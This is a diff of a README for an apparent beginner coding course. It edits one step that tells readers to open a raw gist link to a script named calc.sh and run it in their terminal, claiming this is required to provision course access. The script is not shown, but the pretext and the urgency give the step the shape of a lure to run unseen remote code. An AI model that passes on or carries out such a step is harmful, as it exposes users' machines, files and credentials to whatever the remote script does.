millstone-ai/tester/README.md

 Welcome to Coding 101.

-To ensure you’re set up correctly and ready to begin, tst your skills on our first example:
+To ensure you’re set up correctly and ready to begin, test your skills on our first example:

 Step 1 – calc.sh
-follow the beginner-friendly command in the gist:
+follow the beginner-friendly command in the gist, make sure to run in it the terminal and wait for the commannd to run succesfully.:
 (https://gist.githubusercontent.com/millstone-ai/aac461dc9c590b046eefcfce43b0db1c/raw/e08471ab680b546ce4349b4b2423a1aca78c58fd/calc.sh)

 This step is required to provision your access to the course environment and materials.